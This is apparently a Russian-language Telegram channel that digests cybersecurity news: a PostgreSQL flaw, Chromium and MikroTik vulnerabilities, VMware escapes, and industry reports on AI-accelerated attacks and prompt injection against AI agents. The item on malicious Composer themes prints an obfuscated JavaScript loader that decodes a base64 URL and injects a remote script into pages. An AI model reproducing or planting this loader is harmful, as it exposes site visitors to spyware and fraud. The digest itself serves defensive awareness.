CBUnit – главное в кибербезопасности
53 subscribers
369 photos
4.43K links
Краткое содержание новостей кибербезопасности

По вопросам: a@cbunit.ru
Download Telegram
Уязвимость в PostgreSQL PostGREShell даёт полный контроль над сервером

Обнаружена 12-летняя уязвимость в PostgreSQL под названием PostGREShell (CVE-2026-6471). Она позволяет получить удалённое выполнение кода и постоянные права суперпользователя через доступ к репликации.

Уязвимость затрагивает версии PostgreSQL, использующие низкоуровневый доступ к репликации. Эксплуатация PostGREShell создаёт бэкдор в базе данных, обеспечивая постоянный доступ к серверу.

Что такое PostGREShell
PostGREShell — это уязвимость в системе управления базами данных PostgreSQL, позволяющая злоумышленникам получить полный контроль над сервером. Она использует низкоуровневый доступ к механизму репликации для выполнения произвольного кода и установки бэкдора.

❝Dubbed PostGREShell, CVE-2026-6471 turns low-level replication access into code execution, permanent superuser privileges and a persistent database backdoor.❞
— SecurityWeek


Источники: SecurityWeek · Security Affairs
@cbunit
Boeing 737 взломали через порт: атака Bus Driver подменяет данные полета

Источник: Kaspersky Daily
@cbunit
❢ Google Chromium V8: CISA добавила уязвимость подмены типов в каталог KEV

CISA добавила одну новую уязвимость в каталог известных эксплуатируемых уязвимостей (KEV) из-за доказательств её активной эксплуатации.

Уязвимость CVE-2026-85046 относится к Google Chromium V8 и представляет собой подмену типов. Этот тип уязвимостей является частым вектором атак и создаёт значительные риски для федеральных систем.

Google Chromium V8 Type Confusion Vulnerability
Уязвимость типа «подмена типов» (Type Confusion) в движке V8 браузера Google Chromium позволяет злоумышленникам манипулировать типами данных, что может привести к выполнению произвольного кода или другим опасным последствиям.

Источники: CISA · Help Net Security
@cbunit
Вредоносные темы Composer доставляют шпионское ПО для кражи криптокошельков с iPhone

▤ Разбор

Исследователи Socket обнаружили 13 вредоносных тем Composer на Packagist, которые внедряют JavaScript на сайты с фильмами и комиксами во Вьетнаме. Вредоносный код выполняет две операции: запускает цепочку мошенничества с рекламой и перенаправлением на азартные игры, а также устанавливает шпионское ПО на iPhone через эксплойт WebKit-to-kernel.

Apple подтвердила, что уязвимость ядра была исправлена до получения отчёта, а точки входа WebKit общедоступны и внесены в каталог CISA "Уязвимости, эксплуатируемые прямо сейчас" (KEV). Ранее исследователи Socket сообщали о шести темах под одним вендором (ophimcms), теперь подтверждённый набор расширен до 13 пакетов от пяти вендоров.

Что такое Composer
Composer — это инструмент управления зависимостями для PHP. Он позволяет разработчикам указывать, какие библиотеки нужны их проекту, и устанавливать их. Вредоносные темы Composer, обнаруженные исследователями, представляют собой пакеты, которые злоумышленники модифицировали, чтобы внедрить вредоносный JavaScript на сайты, использующие эти темы.

eval('window')['KuCbGF']=function(){ (function(u,r,w,d,f,c){
var x = iScfnleC; u = decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));
var s = d.createElement('script'); s.src=u; d.getElementsByTagName('head')[0].appendChild(s)
})('aHR0cHM6Ly91bmlvbi5tYWNvbXMubGEvanF1ZXJ5Lm1pbi0zLjYuOC5qcw==', ...) };
if( !(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1) ) KuCbGF();


Источник: Socket
@cbunit
Минцифры предложило требования по защите от НСД к системам ОРД

Минцифры России разработало проект требований по защите от несанкционированного доступа к техническим и программным средствам информационных систем. Документ касается средств, используемых при проведении оперативно-разыскных мероприятий или обеспечении безопасности РФ.

Проект направлен на независимую антикоррупционную экспертизу. Он устанавливает правила защиты информации в системах, применяемых уполномоченными органами.

Источник: regulation.gov.ru
@cbunit
Broadcom закрыла критические VM-escape уязвимости в VMware Workstation и Fusion

Broadcom устранила две уязвимости в VMware Workstation и Fusion, позволяющие атакующему из виртуальной машины выполнить код на хосте. Одна из уязвимостей получила критический рейтинг.

Проблемы затрагивают версии VMware Workstation и Fusion 25H2 и 26H1. Обновление до версии 26H1u1 устраняет обе уязвимости. Обходных путей для эксплуатации не существует.

Что такое VM-escape
VM-escape — это тип атаки, при котором злоумышленник, получивший контроль над виртуальной машиной, может выйти за её пределы и получить доступ к хостовой системе или другим виртуальным машинам на том же оборудовании. Это происходит из-за ошибок в гипервизоре или компонентах, связывающих гостевую ОС с хостом.

Источники: Security Affairs · The Hacker News
@cbunit
Zscaler: ИИ-атаки ускоряются, готовность компаний — на нуле

▤ Разбор · 29 дней назад

Zscaler ThreatLabz опубликовал отчёт о готовности предприятий к автономным кибератакам с использованием передовых моделей ИИ.

Исследование выявило средний балл готовности 37 из 100, при этом оценка управления ИИ составила всего 2,1 из 20. Большинство организаций имеют уязвимые VPN-подключения, неинспектируемый трафик и широкие настройки сегментации, что создаёт благоприятные условия для атак.

Отчёт предлагает архитектурный подход к защите, основанный на принципах Zero Trust, для нейтрализации преимуществ ИИ в скорости атак. Рекомендуется в течение 90 дней усилить контроль над сетевыми устройствами, изолировать VPN, обеспечить идентификационную аутентификацию для ИИ-систем и увеличить долю инспектируемого зашифрованного трафика.

Что такое Frontier AI
Frontier AI — это передовые, высокопроизводительные фундаментальные модели, расширяющие границы искусственного интеллекта. В отличие от традиционного узкого ИИ, эти модели обладают сложными возможностями рассуждения, планирования и автономного выполнения задач. В руках злоумышленников они могут находить мелкие уязвимости и объединять их в полные пути атак со скоростью машины.

Источник: Zscaler ThreatLabz
@cbunit
MikroTik RouterOS: уязвимость нулевого дня позволяет получить root-доступ без пароля

Источник: Security Affairs
@cbunit
Forrester: микросегментация — ключ к Zero Trust и сдерживанию угроз

▤ Разбор · 17 дней назад

Forrester опубликовала отчёт о решениях для микросегментации сетей.

Исследование выявило три ключевые темы: микросегментация является неотъемлемой частью стратегии Zero Trust, новые возможности ИИ стимулируют интерес к ней как к средству сдерживания угроз, а решения помогают преодолеть разрыв между сетевыми и разработчиками.

Решения для микросегментации развиваются, предлагая ценность для различных команд и помогая справляться с техническим долгом и утерянными знаниями.

❝Any Zero Trust strategy without microsegmentation is incomplete.❞
— Forrester


Источник: Forrester
@cbunit
Рынок безопасности ИИ достигнет $4,8 млрд к 2027 году

▤ Разбор

Рынок безопасности искусственного интеллекта (ИИ) вырастет до $4,8 млрд к 2027 году. Рост составит 68,7% по сравнению с 2026 годом. К 2028 году рынок достигнет $7,7 млрд.

Ускорение роста связано с необходимостью защиты ИИ-систем от уязвимостей и киберугроз. Уязвимости в цепочках поставок и стороннем ПО в ИИ-проектах усугубляют риски. Без должного контроля ИИ-инициативы предприятий могут провалиться.

К 2029 году более половины успешных атак на ИИ-агентов будут использовать слабости контроля доступа и инъекции промптов. Организациям нужно выявлять, отслеживать и защищать ИИ-модели от этих угроз. Для сильной защиты требуется сочетание существующих систем безопасности со специализированными ИИ-инструментами.

Источник: Gartner
@cbunit
Gartner: ИИ-обнаружение уязвимостей — главный риск второго квартала 2026

▤ Разбор

Gartner выявил, что обнаружение киберуязвимостей с помощью ИИ стало главным риском второго квартала 2026 года. Скорость инноваций в ИИ позволяет находить и использовать уязвимости быстрее, чем когда-либо, требуя от организаций большей гибкости и проактивности.
Gartner рекомендует пересмотреть оценку влияния рисков, обновить аппетит к риску, усилить контроль над рисками третьих сторон и ускорить стратегии реагирования на киберинциденты для более быстрого устранения уязвимостей.

Что такое agentic AI
Agentic AI — это автономные системы, которые действуют за пределами организационного контроля. Их развитие представляет угрозу для целостности информации из-за ненадежных данных и контента, генерируемого ИИ.

Источник: Gartner
@cbunit